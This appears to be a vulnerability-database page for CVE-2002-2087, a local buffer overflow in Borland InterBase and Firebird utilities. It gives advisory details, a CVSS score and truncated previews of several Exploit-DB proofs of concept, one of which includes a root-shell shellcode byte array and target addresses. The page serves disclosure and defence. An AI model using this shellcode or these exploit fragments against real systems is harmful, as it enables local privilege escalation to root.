CVE-2002-2087
Published 2002-12-31
Priority P417 · medium · 4.6 (CVSS 2.0)
AV:L/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.26% (66.1th percentile)
Buffer overflow in Borland InterBase 6.0 allows local users to execute arbitrary code via a long INTERBASE environment variable when calling (1) gds_drop, (2) gds_lock_mgr, or (3) gds_inet_server.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| borland_software | interbase | — | — |
No detection rules found.
Exploit-DB
Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Local Privilege Escalation
exploitdb·2003-05-12
CVE-2003-0281 Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Local Privilege Escalation
---
/* DSR-firebird.c
Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE
This is Proof Of concept code.
bash-2.05a$ ./DSR-firebird
( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )
( ( by - [email protected] ) )
Usage: ./DSR-firebird
Targets:
1. [0xbfbff75d] - gds_inet_server
2. [0xbfbff75c] - gds_lock_mgr
3. [0xbfbff75e] - gds_drop
bash-2.05a$
*/
#include
#include
#include
#define LOCK "/usr/local/firebird/bin/gds_lock_mgr"
#define DROP "/usr/local/firebird/bin/gds_drop"
#define INET "/usr/local/firebird/bin/gds_inet_server"
#define LEN 1056
char dropcode[]=
"\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0"
"\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
Exploit-DB
Firebird 1.0 - GDS_Inet_Server Interbase Environment Variable Buffer Overflow
exploitdb·2003-05-10
CVE-2002-2087 Firebird 1.0 - GDS_Inet_Server Interbase Environment Variable Buffer Overflow
---
// source: https://www.securityfocus.com/bid/7546/info
Interbase is a database distributed and maintained by Borland. It is available for Unix and Linux operating systems. As Firebird is based on Borland/Inprise Interbase source code, it is very likely that Interbase is prone to this issue also.
A buffer overflow has been discovered in the setuid root program gds_inet_server, packaged with Firebird. This problem could allow a local user to execute the program with strings of arbitrary length. By using a custom crafted string, the attacker could overwrite stack memory, including the return address of a function, and potentially execute arbitrary code as root.
/* DSR-olbird.c by [email protected]
Same exploit
Exploit-DB
Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (2)
exploitdb·2002-06-18
CVE-2003-0281 Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/5044/info
Interbase is a database distributed and maintained by Borland. It is available for Unix and Linux operating systems.
A buffer overflow has been discovered in the gds_drop program packaged with Interbase. This problem could allow a local user to execute the program with strings of arbitrary length. By using a custom crafted string, the attacker could overwrite stack memory, including the return address of a function, and potentially execute arbitrary code.
Firebird is based on Borland/Inprise Interbase source code and is therefore also prone to this issue.
/* DSR-firebird.c by [email protected]
Tested on: Firebird 1.0.2 FreeBSD 4.7-RELEASE
bash-2.05a$ ./
Exploit-DB
Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (1)
exploitdb·2002-06-15
CVE-2003-0281 Interbase 6.0 - GDS_Drop Interbase Environment Variable Buffer Overflow (1)
---
source: https://www.securityfocus.com/bid/5044/info
Interbase is a database distributed and maintained by Borland. It is available for Unix and Linux operating systems.
A buffer overflow has been discovered in the gds_drop program packaged with Interbase. This problem could allow a local user to execute the program with strings of arbitrary length. By using a custom crafted string, the attacker could overwrite stack memory, including the return address of a function, and potentially execute arbitrary code.
Firebird is based on Borland/Inprise Interbase source code and is therefore also prone to this issue. *
#!/usr/bin/perl -w
#
# gds_drop exploit for Interbase 6.0 linux beta
#
# - tested on redhat 7.2
#
No writeups or analysis indexed.
http://cert.uni-stuttgart.de/archive/bugtraq/2002/06/msg00222.html
http://www.iss.net/security_center/static/9392.php
http://www.securityfocus.com/bid/5044
http://www.securityfocus.com/bid/5046